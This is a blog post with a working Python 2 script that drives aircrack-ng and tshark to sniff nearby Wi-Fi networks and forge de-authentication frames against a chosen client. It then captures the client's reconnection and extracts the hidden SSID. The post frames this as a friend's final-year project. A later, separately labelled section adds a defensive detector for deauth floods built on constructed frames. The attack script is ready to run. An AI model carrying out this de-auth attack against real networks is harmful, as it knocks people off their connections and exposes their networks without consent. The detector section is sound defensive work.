September 9, 2014

Python script: SSID sniffer, de-auth attack and packet capture using Aircrack-ng and tshark

I was asked by my friend, Atikah, to write some Python scripts for her final year project. The project involves discovering the hidden SSIDs of surrounding Wi-Fi networks. Getting a non-hidden SSID is just a matter of turning on the wireless card. For a hidden SSID, the trick is to capture the authentication and association packets a connected client sends to that Wi-Fi network and read the SSID from them.

To do that, we perform a de-auth attack on that specific client, which disconnects it from the Wi-Fi network. Once disconnected, the client automatically tries to reconnect by sending authentication and association packets to the network's access point.

We then capture these packets and analyse them for information.

#!/usr/bin/env python
# Python 2 script. Needs the aircrack-ng suite and tshark installed, and root privileges.

import os
from time import sleep

print "1 - Put the wireless card to monitor mode."
print "2 - Sniff for surrounding wireless network and list all BSSIDs"
print "3 - Perform deAuth attack to a client from an AP"
print "4 - Capture packets into a file and examine it (if "
print " "
print "IMPORTANT NOTE: Press CNTRL+C to stop both the sniffing process and packets capture process"
sleep(5) #pause for 5 seconds so user can read the info

try:
    os.system("airmon-ng start wlan0") #set wireless card to monitor mode (creates mon0)
    sleep(5) #pause for 5 seconds so user can read the info
    print "wireless card is set to monitor mode. Start sniffing..."
    os.system("airodump-ng mon0") #list nearby APs and their clients until Ctrl+C
except KeyboardInterrupt:
    pass

print "Sniffing process stopped."

print "Lets start deAuth attack. Pick an AP and a connected client"
bssid = raw_input("Enter the MAC address of the hidden SSID of an AP (BSSID) : ")
station = raw_input("Enter the MAC address of connected client (STATION) : ")

try:
    print "Start deAuth attack..."
    os.system("aireplay-ng --deauth 10 -a %s -c %s mon0 --ignore-negative-one" % (bssid, station)) #send 10 deAuth frames to the client on behalf of the AP
except KeyboardInterrupt:
    pass

print " "
print "deAuth attack is stopped. At this point, the client is trying to re-authenticate with the AP"
print "Lets capture the packets"
sleep(5) #pause for 5 seconds so user can read the info

try:
    os.system("airodump-ng --bssid %s -w captured_packet mon0" % (bssid)) #capture only frames for this BSSID; airodump-ng numbers the output file
except KeyboardInterrupt:
    pass

print "The captured packets are saved to a file in the same directory - captured_packet-01.cap"

print " "
print "Displaying the SSIDs found in the captured packets..."
# -r reads the capture, -Y applies the display filter (the original passed the filter to a second -r, so tshark ignored it)
os.system("tshark -r captured_packet-01.cap -Y 'wlan.bssid == %s' | grep SSID | sed 's/^.*SSID=//' | sort | uniq" % bssid)
print "end"
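The defender's view of the de-auth attack described above, as an added example that is not part of the original post (Python 3, standard library only): it decodes raw 802.11 management frames from a monitor-mode capture, counts deauthentication/disassociation frames per BSSID in a sliding time window and flags a burst like the one aireplay-ng produces. The capture is constructed inline (no radiotap header, no FCS); the MAC addresses, the window and the threshold are assumptions.

```python
import struct
from collections import defaultdict

TYPE_MGMT, SUBTYPE_DEAUTH, SUBTYPE_DISASSOC = 0, 12, 10  # IEEE 802.11 Frame Control values

def parse_80211_header(frame):
    """Decode a raw 802.11 MAC header -> (type, subtype, addr1, addr2, bssid, reason) or None."""
    if len(frame) < 24:
        return None
    fc = frame[0]                       # Frame Control, low byte: version | type | subtype
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    mac = lambda off: ":".join("%02x" % b for b in frame[off:off + 6])
    reason = None
    if ftype == TYPE_MGMT and subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]   # reason code, little-endian body field
    return ftype, subtype, mac(4), mac(10), mac(16), reason

def detect_deauth_flood(frames, window=5.0, threshold=5):
    """frames: iterable of (timestamp_s, raw_frame). Returns {bssid: peak_count} for BSSIDs
    that saw more than `threshold` deauth/disassoc frames within any `window` seconds."""
    per_bssid = defaultdict(list)
    for ts, raw in frames:
        hdr = parse_80211_header(raw)
        if hdr and hdr[0] == TYPE_MGMT and hdr[1] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            per_bssid[hdr[4]].append(ts)
    alerts = {}
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                alerts[bssid] = max(alerts.get(bssid, 0), end - start + 1)
    return alerts

def build_mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Constructed test data only: a minimal 802.11 management frame (FC, duration, 3 addrs, seq)."""
    hexmac = lambda m: bytes.fromhex(m.replace(":", ""))
    frame = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0]) + b"\x00\x00"
    frame += hexmac(dst) + hexmac(src) + hexmac(bssid) + b"\x00\x00"
    return frame + (struct.pack("<H", reason) if reason is not None else b"")

AP, CLIENT, BCAST = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "ff:ff:ff:ff:ff:ff"  # assumed MACs
# Constructed capture: a burst of broadcast deauths (reason 7, the pattern a deauth tool
# produces) against AP, one ordinary deauth on another AP, and one beacon (subtype 8).
SAMPLE = [(0.1 * i, build_mgmt_frame(SUBTYPE_DEAUTH, BCAST, AP, AP, 7)) for i in range(10)]
SAMPLE.append((2.0, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, "aa:aa:aa:aa:aa:aa", "aa:aa:aa:aa:aa:aa", 3)))
SAMPLE.append((2.5, build_mgmt_frame(8, BCAST, AP, AP)))
print(detect_deauth_flood(SAMPLE))   # -> {'00:11:22:33:44:55': 10}
```

On real traffic, feed the function (timestamp, frame) pairs read from a monitor-mode pcap after stripping the radiotap header; an AP that supports 802.11w (protected management frames) will reject the forged deauth frames this detector is looking for.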